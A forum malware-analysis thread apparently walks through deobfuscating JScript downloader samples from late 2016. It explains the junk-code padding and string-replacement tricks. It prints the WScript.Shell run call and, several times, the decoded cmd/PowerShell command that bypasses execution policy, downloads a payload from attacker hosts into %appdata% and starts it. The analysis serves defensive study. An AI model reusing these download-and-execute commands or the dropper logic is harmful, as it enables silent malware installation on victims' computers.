awvisxobnics = "zyngetjemw";
cerafqo = "clifly";
var ogrosu = "(";
var ucynotweg = '37462';
var gasvozgi = 'replace';
var gpibmoqma = 'e8a5';
var gmesoza = '35358';
var skubkuvr = 'h';
var fedses = undefined;
var ezufud = undefined;
var estyla = 0;
var kukxyqnohsy = 'ucuxifxil';

Then, Main part :

var xpoqys = mhuxezyd();

=> the command line : the string deobfuscated, after the call of mhuxezyd() function we have seen above

xpoqys :

"cmd.exe /c Pow^ers^hell.^exe^ -^exe^c^u^tI^oNpo^lIcy^ ByPaSs^ -^n^Op^rO^fi^Le ^-wINdo^wstyl^e ^hi^ddeN^ ^(N^e^w^-^o^bj^ect^ s^y^ste^m.Ne^t.We^b^clieN^t).^dOwNLoa^d^Fil^e(^'http ://wipoleer.top/user.php?f=1.dat','%appdata%.eXe');St^a^r^t-pRo^c^eS^S^ %aPPdata%.eXe"

=> it mixes lowercase, uppercase and '^' char to hurt ours eyes

but the RUN method understand all.

=> can be written :

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://wipoleer.top/user.php?f=1.dat','%appdata%.exe');start-process %appdata%.exe"

if (mnegasic() == -3) {

=> always false :

function mnegasic() {

var esesox = 2;
return esesox;

}

...
...
...

=> Always here
} else {

var ittirra = new ActiveXObject("WScript.Shell");

=> Creates an object Shell
=> remember the run part we have found :

case null:

ittirra[cimy](xpoqys, xvafdyv);
=> object_shell.run(.....)

break;

if (fedses == 20) {

=> fedses = undefinied (this the end of spoiler about var initialization)

...
...
...

=> Always here
} else {
var pdufluz = null;
var xquqmapg = null;
var qluzynygry = "cwehfumq";
var kcopabv = 13.78;
var igaqsips = kcopabv + qluzynygry;
igaqsips = "udvocajc" + igaqsips;
var csomyfh = "62274";
csomyfh = 932 + csomyfh;
var ycmemga = 54;
var gdovusxanu = ucynotweg + ycmemga;
gdovusxanu = gdovusxanu + 'efyl';

=> all are useless parts

switch (togagaci()) {

=> always null

function togagaci() {

var sjusbyqoxy = null;
return sjusbyqoxy;

}

=> go to the case null:

case 7.954:
...
...
...
case null:

var rjivta = "qjywary";
if (oxfahzu) {

=> always true

=> var oxfahzu = typeof document1 == 'undefined';

var btumodi = 1;
if (etkozdonkut() == "khiwup") {

=> always false :

function etkozdonkut() {

var kzevbexohy = undefined;
return kzevbexohy;

}

...
...
...

} else {

if (kukxyqnohsy == null) {

=> always false
=> kukxyqnohsy = "ucuxifxil"

...
...
...
} else {

var qxukxuky = 597;

switch (qxukxuky) {

=> will go to case: 597

case true:
...
...
...

case 597:

if (ezufud == undefined) {

=> always true
=> ezufud = undefined

if (myxokyro() == null) {

=> always false :

function myxokyro() {

return "39554";

}

} else {
switch (illijuvi()) {

=>always go to case undefined:

function illijuvi() {

return undefined;

}

case 8:
...
...
...
case undefined:

switch (ajgihpy()) {

=> always go to case undefinied:

function ajgihpy() {

return undefined;

}

case 24.406:
...
...
...
case undefined:
if (atoba() === "bebomguj") {

=> always true :

function atoba() {

var vqyzywur = "bebomguj";
return vqyzywur;

}

switch (estyla) {

=> always 0 : go to case 0:
=> var estyla = 0;

case undefined:
...
...
...
case 0:

var qmiwajkypa = 0;

if (qmiwajkypa === 0) {

=> hahaha, always true

var urbere = null;
switch (urbere) {

=> always null, go to case null:

case 7:

...

...
...
case null:

ittirra[cimy](xpoqys, xvafdyv);
break;

!!! RUN PART !!!

ittirra[cimy](xpoqys, xvafdyv);

=> object_Shell.run(strCommand, intWindowStyle);

- strCommand : The Command to be executed

- intWindowStyle : Int value indicating the appearance of the program's window

After this part, some steps to reach the end of the script, with not only breaks, but useless parts (to obfuscated a bit more !? )

var rcoqovxi = 20;
var sxucitgy = "yrjucimy";
mfejervoxw = 3;
awypjadv = sxucitgy + mfejervoxw;
var nylytzu = 85;
}
break;
...
...
var ohfuzidkyh = true;
umewijly = 57.074;
var etsapkoqufg = umewijly + yrugokk;
etsapkoqufg = etsapkoqufg + 32.2;
var akgiwyxfu = 0;
...
...
var ibdifef = 766;
break;
...
...
break;
...
...
var mjolaljez = null;
var zubisuvi = 3.99;
var oqadyhign = zubisuvi + onwulodto;
var jhoqih = "zuwq";
...
...
jhoqih = 223.666 + jhoqih;
var kvovir = '2115';
ifxise = 3;
var quvaterru = ifxise + kvovir;
var pizhuba = 0;
break;

2-3) Conclusion for obfuscation used:

In comparison with the 'path' followed by precedent method, a lot of more useless part has been added :

We can see on the content that functions declaration and vars are mixed.
We will follow the real "steps" :

var tyfjepfef = /ujixxu/gi;
var hyqzuski = /exozett/gi;
var axucw = 'c';
var ujcilf = 'e';
var hifenmuhz = 'replace';
var lmesinpuhc = 1;
var fqopwytlu = 0;
var wlypnapidi = typeof document;
var ehigym = 0;
var unynz = 'ike';
var zcewobpe = null;
var ymidv = 'a';
var arxugti = '75497';
var nlany = '^';
var exmademojv = null;
var odacik = /ejewca/gi;
var etuqmowuh = undefined;
var jzehykli = /sipxuqm/gi;
var karuvysse = 'unissah';

if (xaskyfuz() === 90) {
=> function xaskyfuz() {
return null;
}
var ispegibnys = 2.248;
if (ispegibnys === 10.248) {

else
var togultyku = new ActiveXObject("WScript.Shell"); IMPORTANT !
switch (eqymfeg()) {
=> function eqymfeg() {
return 77;
}
case '74904':
if (etuqmowuh == 168) {
var bqylholl = null;
}
break;
case 77:
if (wlypnapidi == "undefined") {
=> var wlypnapidi = typeof document;
=> always "undefined" if not running on a Browser !
switch (atseqne()) {
=> function atseqne() {
var atepoho = undefined;
return atepoho;
}
case null:...
...
here, multiple case:
...
...
case undefined:
togultyku.run(yvedy(), fqopwytlu);

=> the function we have seen on "2-1) First, a quick look at the script :"

=> run :
"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^)"
break;}

If you follow step by step the script, it is now very Very very long.
Always the same path is followed, at each star, but they made it longer to reach the run part.

BUT : no need to follow all steps : it took few seconds to completely understand and find where were the important parts (see again the 2-1) )

The most important, is not the length, but the method

3) Explanation of the command string :

all in lowercase and without the occurrences of '^' :

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://wipoleer.top/user.php?f=1.dat','%appdata%.exe');start-process %appdata%.exe"

- powershell.exe is run :

- object System.net.Webclient is created

- its method downloadFile(parameter1, parameter2) is used

- parameter1 : URL from where to download the payload
- parameter2 : the path + name to be use for the Payload

- Start-Process %APPDATA%.eXe : run the Payload

=> Roaming.eXe

In previous analysis, it was :

%APPDATA%\eXe

=> C:\Users\DardiM\AppData\Roaming\eXe
=> file : Payload : eXe

here :

%APPDATA%.eXe
=> C:\Users\DardiM\AppData\Roaming.exe

URL :

http ://wipoleer.top/user.php?f=1.dat

END

DardiM · Nov 8, 2016

BALLANCE_26256.js

Fromhttps://malwaretips.com/threads/08-11-2016-11.65243/
Thanks to Der.Reisende,

Why this sample ?
Just to show how easy it is to deobfuscate it, and that the whole part don't obfuscate...
(See the spoiler)

1) What it looks like :

2) (Very )Quick deobfuscation

2-1) find the word 'run' (without quotes) :

=> case 41.4614:
posypd.run(rqipu, hsymohi);
break;

=> shell.run :

parameter 1 : rqipu => command line
parameter 2 : hsymohi : 0

2-2) Find the command line :

See the first post for explanations : similar method used

=> var rqipu = acihe();

acihe() :

function acihe() {

var etmazyjxu = "=13792=31697=57385=78152-63277x-63277-5920743238=13792-59207P=1407134660o80560-63277R=1407134660=88554=1407134660-38729-63277=1407134660L=1407134660l=78152-63277x-63277=1407134660-59207-59207-59207=14071-63277X-63277=13792=1407134660U=43385ioN=1407134660POL=1407134660i=13792=1407134660y-59207-59207-59207BY=1407134660p=1407134660-69808=1407134660=88554=88554-59207-59207-59207-59207=1407134660=14071no=1407134660Pr=1407134660O=1407134660fil-63277-59207-59207-59207-59207-59207=1407134660=1407180560=1407134660iN=57385o80560=88554=43385Y=1407134660L=1407134660-63277-59207-59207-59207=1407134660-38729=1407134660i=57385=1407134660=57385=1407134660-63277=1407134660n-59207-59207-59207-87968N-6327780560=1407134660=14071oB=1407134660j-63277=13792=43385-59207-59207=88554Y=1407134660=88554=43385-63277=1407134660=31697=1407134660=78152N=1407134660-63277=43385=7815280560-63277b=13792l=1407134660I-63277N=43385=77153=78152=1407134660=57385o80560nL=1407134660O-69808=57385f=1407134660il-63277-87968=140713466034991-38729=43385=43385p214734323843238805608056080560=78152r-63277f-63277r-63277n=13792-63277=88554-69808u=78152=43385op43238u=88554-63277r=78152p-38729p?f=1=78152=57385-69808=4338534991,34991=10857-69808pp=57385-69808=43385-69808=10857=78152-63277X-6327734991=7715319540=88554=1407134660=43385=1407134660-69808R=43385=14071P=1407134660R=1407134660O=13792-63277=88554=1407134660=88554=1407134660-59207=10857-69808pP=57385-69808=43385-69808=10857=78152-63277X-63277";

var abaga = ["=88554", '-59207', "-69808", '-87968', "=31697", "-38729", "-63277", '=10857', '34991', "80560", '=13792', "=14071", '-34660', "19540", "=78152", '-78151', '=43385', "43238", "21473", "=77153", '=57385'];

var oqoz = ['s', ' ', "a", "(", "m", 'h', 'e', "%", "'", 'w', 'c', "-", '^', ";", ".", '\,', 't', '/', ":", ')', 'd'];

var cidwow = false;

var hyce = new Function(emdih + "Stream == 'unknown'")();

while (1) {

if (!cidwow) cidwow = 0;
if (cidwow == abaga.length) break;
var ppollo = abaga[cidwow];
switch (hyce) {

case true:

etmazyjxu = etmazyjxu[ocodruty](new RegExp(ppollo, ybytorw), oqoz[cidwow]);

break;

}
cidwow++;

}
return etmazyjxu;

}

- var etmazyjxu : obfuscated string
- var abaga : patterns to be replaced
- var oqoz : char to replace the patterns

the function returns the command line :

"cmd.exe /c P^oweR^s^he^L^l.exe^ -eXec^UtioN^POL^ic^y BY^p^a^ss ^-no^Pr^O^file ^-w^iNdowstY^L^e ^h^id^d^e^n (New^-oB^ject sY^ste^m^.N^et.webcl^IeNt).^downL^Oadf^ile(^'http: //www .referencesau.top/user.php?f=1.dat','%appdata%.eXe');s^t^aRt-P^R^Oces^s^ %apPdata%.eXe"

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http: //www .referencesau.top/user.php?f=1.dat','%appdata%.exe');start-process %appdata%.exe"

3) Conclusion:

URL : http ://www .referencesau.top/user.php?f=1.dat

PATH : %appdata%

Example : C:\Users\DardiM\AppData\Roaming

PAYLOAD : Roaming.exe (because they wrote : %appdata%.exe)

See the first post for details

Search

Malware Analysis Easy to deobfustate - evolution of a js/downloader family - Oct,19 - Nov,2 and 8 - updated

DardiM

Level 26

DardiM

Level 26

Similar threads